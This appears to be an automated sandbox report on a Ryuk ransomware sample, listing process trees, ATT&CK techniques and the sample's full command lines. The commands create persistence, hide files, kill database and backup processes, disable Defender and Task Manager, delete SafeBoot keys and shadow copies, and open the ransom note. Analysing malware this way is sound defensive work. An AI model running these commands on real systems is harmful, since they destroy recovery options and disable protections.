Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1272 schtasks.exe
4876 schtasks.exe
4500 schtasks.exe
3412 schtasks.exe

pid	process
1532	sc.exe
1620	sc.exe
2008	sc.exe
820	sc.exe

pid	process
1272	schtasks.exe
4876	schtasks.exe
4500	schtasks.exe
3412	schtasks.exe

Interacts with shadow copies 2 TTPs 15 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
2064	vssadmin.exe
3740	vssadmin.exe
4864	vssadmin.exe
1876	vssadmin.exe
4872	vssadmin.exe
4196	vssadmin.exe
2688	vssadmin.exe
228	vssadmin.exe
1356	vssadmin.exe
3540	vssadmin.exe
2052	vssadmin.exe
680	vssadmin.exe
824	vssadmin.exe
3848	vssadmin.exe
3664	vssadmin.exe

Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

4496 taskkill.exe
4964 taskkill.exe
440 taskkill.exe
4900 taskkill.exe
4844 taskkill.exe
Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings cmd.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

4428 NOTEPAD.EXE
Runs net.exe

pid	process
4496	taskkill.exe
4964	taskkill.exe
440	taskkill.exe
4900	taskkill.exe
4844	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings	cmd.exe

pid	process
4428	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe

pid	process
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

taskkill.exetaskkill.exeWMIC.exevssvc.exetaskkill.exetaskkill.exetaskkill.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

description	pid	process
Token: SeDebugPrivilege	4900	taskkill.exe
Token: SeDebugPrivilege	4844	taskkill.exe
Token: SeIncreaseQuotaPrivilege	1084	WMIC.exe
Token: SeSecurityPrivilege	1084	WMIC.exe
Token: SeTakeOwnershipPrivilege	1084	WMIC.exe
Token: SeLoadDriverPrivilege	1084	WMIC.exe
Token: SeSystemProfilePrivilege	1084	WMIC.exe
Token: SeSystemtimePrivilege	1084	WMIC.exe
Token: SeProfSingleProcessPrivilege	1084	WMIC.exe
Token: SeIncBasePriorityPrivilege	1084	WMIC.exe
Token: SeCreatePagefilePrivilege	1084	WMIC.exe
Token: SeBackupPrivilege	1084	WMIC.exe
Token: SeRestorePrivilege	1084	WMIC.exe
Token: SeShutdownPrivilege	1084	WMIC.exe
Token: SeDebugPrivilege	1084	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1084	WMIC.exe
Token: SeRemoteShutdownPrivilege	1084	WMIC.exe
Token: SeUndockPrivilege	1084	WMIC.exe
Token: SeManageVolumePrivilege	1084	WMIC.exe
Token: 33	1084	WMIC.exe
Token: 34	1084	WMIC.exe
Token: 35	1084	WMIC.exe
Token: 36	1084	WMIC.exe
Token: SeBackupPrivilege	836	vssvc.exe
Token: SeRestorePrivilege	836	vssvc.exe
Token: SeAuditPrivilege	836	vssvc.exe
Token: SeIncreaseQuotaPrivilege	1084	WMIC.exe
Token: SeSecurityPrivilege	1084	WMIC.exe
Token: SeTakeOwnershipPrivilege	1084	WMIC.exe
Token: SeLoadDriverPrivilege	1084	WMIC.exe
Token: SeSystemProfilePrivilege	1084	WMIC.exe
Token: SeSystemtimePrivilege	1084	WMIC.exe
Token: SeProfSingleProcessPrivilege	1084	WMIC.exe
Token: SeIncBasePriorityPrivilege	1084	WMIC.exe
Token: SeCreatePagefilePrivilege	1084	WMIC.exe
Token: SeBackupPrivilege	1084	WMIC.exe
Token: SeRestorePrivilege	1084	WMIC.exe
Token: SeShutdownPrivilege	1084	WMIC.exe
Token: SeDebugPrivilege	1084	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1084	WMIC.exe
Token: SeRemoteShutdownPrivilege	1084	WMIC.exe
Token: SeUndockPrivilege	1084	WMIC.exe
Token: SeManageVolumePrivilege	1084	WMIC.exe
Token: 33	1084	WMIC.exe
Token: 34	1084	WMIC.exe
Token: 35	1084	WMIC.exe
Token: 36	1084	WMIC.exe
Token: SeDebugPrivilege	4496	taskkill.exe
Token: SeDebugPrivilege	4964	taskkill.exe
Token: SeDebugPrivilege	440	taskkill.exe
Token: SeSecurityPrivilege	4900	wevtutil.exe
Token: SeBackupPrivilege	4900	wevtutil.exe
Token: SeSecurityPrivilege	4748	wevtutil.exe
Token: SeBackupPrivilege	4748	wevtutil.exe
Token: SeSecurityPrivilege	1128	wevtutil.exe
Token: SeBackupPrivilege	1128	wevtutil.exe
Token: SeSecurityPrivilege	4920	wevtutil.exe
Token: SeBackupPrivilege	4920	wevtutil.exe
Token: SeSecurityPrivilege	4860	wevtutil.exe
Token: SeBackupPrivilege	4860	wevtutil.exe
Token: SeSecurityPrivilege	4832	wevtutil.exe
Token: SeBackupPrivilege	4832	wevtutil.exe
Token: SeSecurityPrivilege	1876	wevtutil.exe
Token: SeBackupPrivilege	1876	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1244 wrote to memory of 1572	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 1244 wrote to memory of 1572	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 1572 wrote to memory of 1272	1572	cmd.exe	schtasks.exe
PID 1572 wrote to memory of 1272	1572	cmd.exe	schtasks.exe
PID 1244 wrote to memory of 2192	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 1244 wrote to memory of 2192	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 1244 wrote to memory of 4404	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 1244 wrote to memory of 4404	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 1244 wrote to memory of 4420	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 1244 wrote to memory of 4420	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 4420 wrote to memory of 4876	4420	cmd.exe	schtasks.exe
PID 4420 wrote to memory of 4876	4420	cmd.exe	schtasks.exe
PID 1244 wrote to memory of 968	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 1244 wrote to memory of 968	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 968 wrote to memory of 3668	968	cmd.exe	attrib.exe
PID 968 wrote to memory of 3668	968	cmd.exe	attrib.exe
PID 1244 wrote to memory of 2236	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 1244 wrote to memory of 2236	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 2236 wrote to memory of 4500	2236	cmd.exe	schtasks.exe
PID 2236 wrote to memory of 4500	2236	cmd.exe	schtasks.exe
PID 1244 wrote to memory of 4100	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 1244 wrote to memory of 4100	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 4100 wrote to memory of 3412	4100	cmd.exe	schtasks.exe
PID 4100 wrote to memory of 3412	4100	cmd.exe	schtasks.exe
PID 1244 wrote to memory of 3928	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 1244 wrote to memory of 3928	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 3928 wrote to memory of 4460	3928	cmd.exe	attrib.exe
PID 3928 wrote to memory of 4460	3928	cmd.exe	attrib.exe
PID 1244 wrote to memory of 320	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 1244 wrote to memory of 320	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 320 wrote to memory of 220	320	cmd.exe	attrib.exe
PID 320 wrote to memory of 220	320	cmd.exe	attrib.exe
PID 1244 wrote to memory of 4804	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 1244 wrote to memory of 4804	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 4804 wrote to memory of 4688	4804	cmd.exe	cmd.exe
PID 4804 wrote to memory of 4688	4804	cmd.exe	cmd.exe
PID 1244 wrote to memory of 836	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 1244 wrote to memory of 836	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 1244 wrote to memory of 2788	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 1244 wrote to memory of 2788	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 836 wrote to memory of 960	836	cmd.exe	cmd.exe
PID 836 wrote to memory of 960	836	cmd.exe	cmd.exe
PID 836 wrote to memory of 4900	836	cmd.exe	taskkill.exe
PID 836 wrote to memory of 4900	836	cmd.exe	taskkill.exe
PID 2788 wrote to memory of 3192	2788	cmd.exe	reg.exe
PID 2788 wrote to memory of 3192	2788	cmd.exe	reg.exe
PID 4688 wrote to memory of 3964	4688	cmd.exe	icacls.exe
PID 4688 wrote to memory of 3964	4688	cmd.exe	icacls.exe
PID 1244 wrote to memory of 2232	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 1244 wrote to memory of 2232	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 1244 wrote to memory of 4480	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 1244 wrote to memory of 4480	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 1244 wrote to memory of 740	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 1244 wrote to memory of 740	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 960 wrote to memory of 4844	960	cmd.exe	taskkill.exe
PID 960 wrote to memory of 4844	960	cmd.exe	taskkill.exe
PID 1244 wrote to memory of 4552	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 1244 wrote to memory of 4552	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 1244 wrote to memory of 2716	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 1244 wrote to memory of 2716	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 1244 wrote to memory of 424	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 1244 wrote to memory of 424	1244	0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe	cmd.exe
PID 424 wrote to memory of 5032	424	cmd.exe	reg.exe
PID 424 wrote to memory of 5032	424	cmd.exe	reg.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Views/modifies file attributes 1 TTPs 5 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid process

292 attrib.exe
3668 attrib.exe
4460 attrib.exe
220 attrib.exe
4732 attrib.exe

pid	process
292	attrib.exe
3668	attrib.exe
4460	attrib.exe
220	attrib.exe
4732	attrib.exe

C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe"
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:1572

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:1272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
- Drops startup file
PID:2192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
PID:4404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
2⤵
- Suspicious use of WriteProcessMemory
PID:4420

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
3⤵
- Creates scheduled task(s)
PID:4876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:968

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
3⤵
- Drops startup file
- Views/modifies file attributes
PID:3668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /RU SYSTEM /RL HIGHEST /F
2⤵
- Suspicious use of WriteProcessMemory
PID:2236

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /RU SYSTEM /RL HIGHEST /F
3⤵
- Creates scheduled task(s)
PID:4500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /F
2⤵
- Suspicious use of WriteProcessMemory
PID:4100

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /F
3⤵
- Creates scheduled task(s)
PID:3412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:3928

C:\Windows\system32\attrib.exe
attrib +h +s ryuk.exe
3⤵
- Views/modifies file attributes
PID:4460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:320

C:\Windows\system32\attrib.exe
attrib +h +s C:\ProgramData\ryuk.exe
3⤵
- Views/modifies file attributes
PID:220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
2⤵
- Suspicious use of WriteProcessMemory
PID:4804

C:\Windows\system32\cmd.exe
cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
3⤵
- Suspicious use of WriteProcessMemory
PID:4688

C:\Windows\system32\icacls.exe
icacls * /grant Everyone:(OI)(CI)F /T /C /Q
4⤵
- Modifies file permissions
PID:3964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:2788

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
3⤵
PID:3192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
2⤵
- Suspicious use of WriteProcessMemory
PID:836

C:\Windows\system32\cmd.exe
cmd.exe /c taskkill /t /f /im sql*
3⤵
- Suspicious use of WriteProcessMemory
PID:960

C:\Windows\system32\taskkill.exe
taskkill /t /f /im sql*
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4844

C:\Windows\system32\taskkill.exe
taskkill /f /t /im veeam*
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
2⤵
PID:2232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
2⤵
PID:4480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
2⤵
PID:740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
2⤵
PID:4552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
2⤵
PID:2716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
2⤵
- Suspicious use of WriteProcessMemory
PID:424

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
3⤵
PID:5032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
2⤵
PID:872

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
3⤵
PID:420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:4668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
2⤵
PID:1632

C:\Windows\system32\reg.exe
reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
3⤵
PID:1620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit
2⤵
PID:2236

C:\Windows\system32\cmd.exe
cmd.exe /c "C:\ProgramData\RyukReadMe.txt "
3⤵
- Checks computer location settings
- Modifies registry class
PID:2588

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\RyukReadMe.txt
4⤵
- Opens file in notepad (likely ransom note)
PID:4428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet
2⤵
PID:3740

